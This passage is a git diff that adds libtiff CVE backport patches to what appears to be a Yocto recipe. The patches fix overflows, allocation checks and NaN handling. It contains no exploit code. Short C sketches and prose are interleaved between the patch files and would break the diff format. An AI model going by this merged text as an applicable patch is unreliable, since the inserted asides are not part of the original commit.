+ if( process_by_block && TIFFIsTiled( in ) )
+ return( cvt_by_tile( in, out ) );
+ else if( process_by_block )
+@@ -539,7 +559,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ }
+
+ static const char* stuff[] = {
+- "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
++ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] [-M size] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+ " zip\t\tZip/Deflate encoding",
+@@ -551,6 +571,7 @@ static const char* stuff[] = {
+ " -b (progress by block rather than as a whole image)",
+ " -n don't emit alpha component.",
+ " -8 write BigTIFF file instead of ClassicTIFF",
++ " -M set the memory allocation limit in MiB. 0 to disable limit",
+ NULL
+ };
+
+--
+GitLab
+
+
+From e9e504193ef1f87e9cb5e986586b0cbe3254e421 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:08:42 +0100
+Subject: [PATCH 2/2] tiff2rgba.1: -M option
+
+---
+ man/tiff2rgba.1 | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/man/tiff2rgba.1 b/man/tiff2rgba.1
+index d9c9baae..fe9ebb2c 100644
+--- a/man/tiff2rgba.1
++++ b/man/tiff2rgba.1
+@@ -87,6 +87,10 @@ Drop the alpha component from the output file, producing a pure RGB file.
+ Currently this does not work if the
+ .B \-b
+ flag is also in effect.
++.TP
++.BI \-M " size"
++Set maximum memory allocation size (in MiB). The default is 256MiB.
++Set to 0 to disable the limit.
+ .SH "SEE ALSO"
+ .BR tiff2bw (1),
+ .BR TIFFReadRGBAImage (3t),
+--
+GitLab
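For clarity, a small sketch of what the new -M handling amounts to (a hypothetical driver program, not the tiff2rgba code itself): the option value is a MiB count, shifted left by 20 bits to get bytes, and 0 disables the check.

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>

    int main(int argc, char *argv[])
    {
        int64_t maxMalloc = (int64_t) 256 << 20;   /* default: 256 MiB       */
        if (argc > 1)
            maxMalloc = (int64_t) strtoul(argv[1], NULL, 0) << 20;

        /* e.g. a 60000x60000 RGBA raster needs roughly 13.4 GiB */
        int64_t raster_bytes = (int64_t) 60000 * 60000 * 4;

        if (maxMalloc != 0 && raster_bytes > maxMalloc) {
            fprintf(stderr, "raster size %lld over memory limit %lld, "
                            "try -b or raise -M\n",
                    (long long) raster_bytes, (long long) maxMalloc);
            return 1;
        }
        return 0;
    }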
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
new file mode 100644
index 0000000000..1f30b32799
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
@@ -0,0 +1,55 @@
+From c8d613ef497058fe653c467fc84c70a62a4a71b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:54:30 +0100
+Subject: [PATCH] gtTileContig(): check Tile width for overflow
+
+fixes #211
+
+Upstream-Status: Backport [ https://gitlab.com/libtiff/libtiff/-/commit/c8d613ef497058fe653c467fc84c70a62a4a71b2 ]
+CVE: CVE-2020-35523
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ libtiff/tif_getimage.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 4da785d3..96ab1460 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -29,6 +29,7 @@
+ */
+ #include "tiffiop.h"
+ #include <stdio.h>
++#include <limits.h>
+
+ static int gtTileContig(TIFFRGBAImage*, uint32*, uint32, uint32);
+ static int gtTileSeparate(TIFFRGBAImage*, uint32*, uint32, uint32);
+@@ -645,12 +646,20 @@ gtTileContig(TIFFRGBAImage* img, uint32* raster, uint32 w, uint32 h)
+
+ flip = setorientation(img);
+ if (flip & FLIP_VERTICALLY) {
+- y = h - 1;
+- toskew = -(int32)(tw + w);
++ if ((tw + w) > INT_MAX) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = h - 1;
++ toskew = -(int32)(tw + w);
+ }
+ else {
+- y = 0;
+- toskew = -(int32)(tw - w);
++ if (tw > (INT_MAX + w)) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = 0;
++ toskew = -(int32)(tw - w);
+ }
+
+ /*
+--
+GitLab
+
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
new file mode 100644
index 0000000000..5232eacb50
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
@@ -0,0 +1,42 @@
+From c6a12721b46f1a72974f91177890301730d7b330 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:01:59 +0100
+Subject: [PATCH] tiff2pdf.c: properly calculate datasize when saving to JPEG
+ YCbCr
+
+fixes #220
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/c6a12721b46f1a72974f91177890301730d7b330
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2020-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiff2pdf.c | 11 ++++++++---
+ 1 file changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index 719811ea..dc69d2f9 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,9 +2087,14 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
+- k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+- if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+- k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
++ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
++ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
++ } else {
++ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
++ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
++ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ }
+ }
+ if (k == 0) {
+ /* Assume we had overflow inside TIFFScanlineSize */
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
new file mode 100644
index 0000000000..406d467766
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
@@ -0,0 +1,36 @@
+From d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 02:05:05 +0100
+Subject: [PATCH] Fix for building without JPEG support
+
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2020-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiff2pdf.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index dc69d2f9..d0b0ede7 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,10 +2087,13 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
++#ifdef JPEG_SUPPORT
+ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
+ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
+ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
+- } else {
++ } else
++#endif
++ {
+ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
new file mode 100644
index 0000000000..e2d136f587
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
@@ -0,0 +1,39 @@
+From a1c933dabd0e1c54a412f3f84ae0aa58115c6067 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 24 Feb 2022 22:26:02 +0100
+Subject: [PATCH] tif_jbig.c: fix crash when reading a file with multiple IFD
+ in memory-mapped mode and when bit reversal is needed (fixes #385)
+
+CVE: CVE-2022-0865
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0865.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_jbig.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/libtiff/tif_jbig.c b/libtiff/tif_jbig.c
+index 74086338..8bfa4cef 100644
+--- a/libtiff/tif_jbig.c
++++ b/libtiff/tif_jbig.c
+@@ -208,6 +208,16 @@ int TIFFInitJBIG(TIFF* tif, int scheme)
+ */
+ tif->tif_flags |= TIFF_NOBITREV;
+ tif->tif_flags &= ~TIFF_MAPPED;
++ /* We may have read from a previous IFD and thus set TIFF_BUFFERMMAP and
++ * cleared TIFF_MYBUFFER. It is necessary to restore them to their initial
++ * value to be consistent with the state of a non-memory mapped file.
++ */
++ if (tif->tif_flags&TIFF_BUFFERMMAP) {
++ tif->tif_rawdata = NULL;
++ tif->tif_rawdatasize = 0;
++ tif->tif_flags &= ~TIFF_BUFFERMMAP;
++ tif->tif_flags |= TIFF_MYBUFFER;
++ }
+
+ /* Setup the function pointers for encode, decode, and cleanup. */
+ tif->tif_setupdecode = JBIGSetupDecode;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
new file mode 100644
index 0000000000..e2f1bd3056
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
@@ -0,0 +1,217 @@
+From 232282fd8f9c21eefe8d2d2b96cdbbb172fe7b7c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 8 Mar 2022 17:02:44 +0000
+Subject: [PATCH] tiffcrop: fix issue #380 and #382 heap buffer overflow in
+ extractImageSection
+
+CVE: CVE-2022-0891
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0891.patch/]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ tools/tiffcrop.c | 92 +++++++++++++++++++-----------------------------
+ 1 file changed, 36 insertions(+), 56 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..e62bcc71 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -105,8 +105,8 @@
+ * of messages to monitor progess without enabling dump logs.
+ */
+
+-static char tiffcrop_version_id[] = "2.4";
+-static char tiffcrop_rev_date[] = "12-13-2010";
++static char tiffcrop_version_id[] = "2.4.1";
++static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #include "tif_config.h"
+ #include "tiffiop.h"
+@@ -6670,10 +6670,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ uint32 img_length;
+ #endif
+- uint32 j, shift1, shift2, trailing_bits;
++ uint32 j, shift1, trailing_bits;
+ uint32 row, first_row, last_row, first_col, last_col;
+ uint32 src_offset, dst_offset, row_offset, col_offset;
+- uint32 offset1, offset2, full_bytes;
++ uint32 offset1, full_bytes;
+ uint32 sect_width;
+ #ifdef DEVELMODE
+ uint32 sect_length;
+@@ -6683,7 +6683,6 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ int k;
+ unsigned char bitset;
+- static char *bitarray = NULL;
+ #endif
+
+ img_width = image->width;
+@@ -6701,17 +6700,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ dst_offset = 0;
+
+ #ifdef DEVELMODE
+- if (bitarray == NULL)
+- {
+- if ((bitarray = (char *)malloc(img_width)) == NULL)
+- {
+- TIFFError ("", "DEBUG: Unable to allocate debugging bitarray");
+- return (-1);
+- }
+- }
++ char bitarray[39];
+ #endif
+
+- /* rows, columns, width, length are expressed in pixels */
++ /* rows, columns, width, length are expressed in pixels
++ * first_row, last_row, .. are index into image array starting at 0 to width-1,
++ * last_col shall be also extracted. */
+ first_row = section->y1;
+ last_row = section->y2;
+ first_col = section->x1;
+@@ -6721,9 +6715,14 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ sect_length = last_row - first_row + 1;
+ #endif
+- img_rowsize = ((img_width * bps + 7) / 8) * spp;
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * bps) % 8;
++ /* The read function loadImage() used copy separate plane data into a buffer as interleaved
++ * samples rather than separate planes so the same logic works to extract regions
++ * regardless of the way the data are organized in the input file.
++ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
++ */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
+@@ -6736,10 +6735,9 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if ((bps % 8) == 0)
+ {
+- col_offset = first_col * spp * bps / 8;
++ col_offset = (first_col * spp * bps) / 8;
+ for (row = first_row; row <= last_row; row++)
+ {
+- /* row_offset = row * img_width * spp * bps / 8; */
+ row_offset = row * img_rowsize;
+ src_offset = row_offset + col_offset;
+
+@@ -6752,14 +6750,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ }
+ else
+ { /* bps != 8 */
+- shift1 = spp * ((first_col * bps) % 8);
+- shift2 = spp * ((last_col * bps) % 8);
++ shift1 = ((first_col * spp * bps) % 8); /* shift1 = bits to skip in the first byte of source buffer*/
+ for (row = first_row; row <= last_row; row++)
+ {
+ /* pull out the first byte */
+ row_offset = row * img_rowsize;
+- offset1 = row_offset + (first_col * bps / 8);
+- offset2 = row_offset + (last_col * bps / 8);
++ offset1 = row_offset + ((first_col * spp * bps) / 8); /* offset1 = offset into source of byte with first bits to be extracted */
+
+ #ifdef DEVELMODE
+ for (j = 0, k = 7; j < 8; j++, k--)
+@@ -6771,12 +6767,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ sprintf(&bitarray[9], " ");
+ for (j = 10, k = 7; j < 18; j++, k--)
+ {
+- bitset = *(src_buff + offset2) & (((unsigned char)1 << k)) ? 1 : 0;
++ bitset = *(src_buff + offset1 + full_bytes) & (((unsigned char)1 << k)) ? 1 : 0;
+ sprintf(&bitarray[j], (bitset) ? "1" : "0");
+ }
+ bitarray[18] = '\0';
+- TIFFError ("", "Row: %3d Offset1: %d, Shift1: %d, Offset2: %d, Shift2: %d\n",
+- row, offset1, shift1, offset2, shift2);
++ TIFFError ("", "Row: %3d Offset1: %"PRIu32", Shift1: %"PRIu32", Offset2: %"PRIu32", Trailing_bits: %"PRIu32"\n",
++ row, offset1, shift1, offset1+full_bytes, trailing_bits);
+ #endif
+
+ bytebuff1 = bytebuff2 = 0;
+@@ -6800,11 +6796,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if (trailing_bits != 0)
+ {
+- bytebuff2 = src_buff[offset2] & ((unsigned char)255 << (7 - shift2));
++ /* Only copy higher bits of samples and mask lower bits of not wanted column samples to zero */
++ bytebuff2 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (8 - trailing_bits));
+ sect_buff[dst_offset] = bytebuff2;
+ #ifdef DEVELMODE
+ TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n",
+- offset2, dst_offset);
++ offset1 + full_bytes, dst_offset);
+ for (j = 30, k = 7; j < 38; j++, k--)
+ {
+ bitset = *(sect_buff + dst_offset) & (((unsigned char)1 << k)) ? 1 : 0;
+@@ -6823,8 +6820,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ for (j = 0; j <= full_bytes; j++)
+ {
+- bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
+- bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (7 - shift1));
++ /* Skip the first shift1 bits and shift the source up by shift1 bits before save to destination.*/
++ /* Attention: src_buff size needs to be some bytes larger than image size, because could read behind image here. */
++ bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
++ bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (8 - shift1));
+ sect_buff[dst_offset + j] = (bytebuff1 << shift1) | (bytebuff2 >> (8 - shift1));
+ }
+ #ifdef DEVELMODE
+@@ -6840,36 +6839,17 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ dst_offset += full_bytes;
+
++ /* Copy the trailing_bits for the last byte in the destination buffer.
++ Could come from one ore two bytes of the source buffer. */
+ if (trailing_bits != 0)
+ {
+ #ifdef DEVELMODE
+- TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n", offset1 + full_bytes, dst_offset);
+-#endif
+- if (shift2 > shift1)
+- {
+- bytebuff1 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (7 - shift2));
+- bytebuff2 = bytebuff1 & ((unsigned char)255 << shift1);
+- sect_buff[dst_offset] = bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 > Shift1\n");
++ TIFFError("", " Trailing bits %4"PRIu32" src offset: %8"PRIu32", Dst offset: %8"PRIu32"\n", trailing_bits, offset1 + full_bytes, dst_offset);
+ #endif
++ /* More than necessary bits are already copied into last destination buffer,
++ * only masking of last byte in destination buffer is necessary.*/
++ sect_buff[dst_offset] &= ((uint8_t)0xFF << (8 - trailing_bits));
+ }
+- else
+- {
+- if (shift2 < shift1)
+- {
+- bytebuff2 = ((unsigned char)255 << (shift1 - shift2 - 1));
+- sect_buff[dst_offset] &= bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 < Shift1\n");
+-#endif
+- }
+-#ifdef DEVELMODE
+- else
+- TIFFError ("", " Shift2 == Shift1\n");
+-#endif
+- }
+- }
+ #ifdef DEVELMODE
+ sprintf(&bitarray[28], " ");
+ sprintf(&bitarray[29], " ");
+@@ -7022,7 +7002,7 @@ writeImageSections(TIFF *in, TIFF *out, struct image_data *image,
+ width = sections[i].x2 - sections[i].x1 + 1;
+ length = sections[i].y2 - sections[i].y1 + 1;
+ sectsize = (uint32)
+- ceil((width * image->bps + 7) / (double)8) * image->spp * length;
++ ceil((width * image->bps * image->spp + 7) / (double)8) * length;
+ /* allocate a buffer if we don't have one already */
+ if (createImageSection(sectsize, sect_buff_ptr))
+ {
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
new file mode 100644
index 0000000000..da3ead5481
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
@@ -0,0 +1,94 @@
+From 40b00cfb32256d377608b4d4cd30fac338d0a0bc Mon Sep 17 00:00:00 2001
+From: Augustus <wangdw.augustus@qq.com>
+Date: Mon, 7 Mar 2022 18:21:49 +0800
+Subject: [PATCH] add checks for return value of limitMalloc (#392)
+
+CVE: CVE-2022-0907
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0907.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcrop.c | 33 +++++++++++++++++++++------------
+ 1 file changed, 21 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..9b8acc7e 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7337,7 +7337,11 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ if (!sect_buff)
+ {
+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
+- *sect_buff_ptr = sect_buff;
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ else
+@@ -7353,15 +7357,15 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ else
+ sect_buff = new_buff;
+
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ }
+
+- if (!sect_buff)
+- {
+- TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+- return (-1);
+- }
+ prev_sectsize = sectsize;
+ *sect_buff_ptr = sect_buff;
+
+@@ -7628,7 +7632,11 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (!crop_buff)
+ {
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
+- *crop_buff_ptr = crop_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ prev_cropsize = cropsize;
+ }
+@@ -7644,15 +7652,15 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ }
+ else
+ crop_buff = new_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ }
+ }
+
+- if (!crop_buff)
+- {
+- TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+- return (-1);
+- }
+ *crop_buff_ptr = crop_buff;
+
+ if (crop->crop_mode & CROP_INVERT)
+@@ -9211,3 +9219,4 @@ invertImage(uint16_t photometric, uint16_t spp, uint16_t bps, uint32_t width, ui
+ * fill-column: 78
+ * End:
+ */
++
+--
+GitLab
+
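The change above boils down to checking the allocation result at the point of allocation, before the buffer is zeroed; a compact sketch of that pattern (illustrative helper, not the tiffcrop code):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static unsigned char *grow_section(unsigned char *buf, size_t size)
    {
        unsigned char *p = realloc(buf, size);
        if (!p) {
            fprintf(stderr, "Unable to allocate/reallocate section buffer\n");
            free(buf);                /* old buffer is still ours to release */
            return NULL;              /* caller maps this to an error return */
        }
        memset(p, 0, size);           /* only reached with a valid pointer   */
        return p;
    }

    int main(void)
    {
        unsigned char *sect = grow_section(NULL, 4096);
        free(sect);
        return sect ? 0 : 1;
    }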
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
new file mode 100644
index 0000000000..e65af6c600
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
@@ -0,0 +1,34 @@
+From a95b799f65064e4ba2e2dfc206808f86faf93e85 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 17 Feb 2022 15:28:43 +0100
+Subject: [PATCH] TIFFFetchNormalTag(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #383)
+
+CVE: CVE-2022-0908
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0908.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dirread.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 50ebf8ac..2ec44a4f 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5021,7 +5021,10 @@ TIFFFetchNormalTag(TIFF* tif, TIFFDirEntry* dp, int recover)
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ if (dp->tdir_count > 0 )
++ {
++ _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ }
+ o[(uint32)dp->tdir_count]=0;
+ if (data!=0)
+ _TIFFfree(data);
+--
+GitLab
+
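The guard added above exists because passing a null pointer to memcpy() is undefined behaviour even when the count is zero; a minimal sketch of the pattern (hypothetical wrapper, not the libtiff code):

    #include <stdio.h>
    #include <string.h>
    #include <stdint.h>

    static void fetch_ascii(char *dst, const char *src, uint32_t count)
    {
        if (count > 0)                /* mirrors the TIFFFetchNormalTag() fix */
            memcpy(dst, src, count);
        dst[count] = '\0';            /* NUL terminator is written either way */
    }

    int main(void)
    {
        char buf[8];
        fetch_ascii(buf, NULL, 0);    /* safe: memcpy is never reached        */
        fetch_ascii(buf, "abc", 3);
        printf("%s\n", buf);
        return 0;
    }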
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
new file mode 100644
index 0000000000..d487f1bd95
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
@@ -0,0 +1,37 @@
+From 32ea0722ee68f503b7a3f9b2d557acb293fc8cde Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 8 Mar 2022 16:22:04 +0000
+Subject: [PATCH] fix the FPE in tiffcrop (#393)
+
+CVE: CVE-2022-0909
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0909.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 57055ca9..59b346ca 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -334,13 +334,13 @@ _TIFFVSetField(TIFF* tif, uint32_t tag, va_list ap)
+ break;
+ case TIFFTAG_XRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_xresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+ case TIFFTAG_YRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_yresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+--
+GitLab
+
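The extra test added above works because NaN is the only floating-point value that compares unequal to itself; a short standalone sketch of that property (not the libtiff code):

    #include <stdio.h>
    #include <math.h>

    static int bad_resolution(double dblval)
    {   /* same shape as the patched checks: reject NaN, then negatives */
        return dblval != dblval || dblval < 0;
    }

    int main(void)
    {
        printf("%d %d %d\n",
               bad_resolution(300.0),      /* 0: accepted             */
               bad_resolution(-1.0),       /* 1: negative             */
               bad_resolution(nan("")));   /* 1: NaN, x != x is true  */
        return 0;
    }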
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
new file mode 100644
index 0000000000..ddb035c972
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
@@ -0,0 +1,58 @@
+From 88d79a45a31c74cba98c697892fed5f7db8b963a Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Thu, 10 Mar 2022 08:48:00 +0000
+Subject: [PATCH] fix heap buffer overflow in tiffcp (#278)
+
+CVE: CVE-2022-0924
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0924.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcp.c | 17 ++++++++++++++++-
+ 1 file changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 224583e0..aa32b118 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1524,12 +1524,27 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+ tdata_t obuf;
+ tstrip_t strip = 0;
+ tsample_t s;
++ uint16 bps = 0, bytes_per_sample;
+
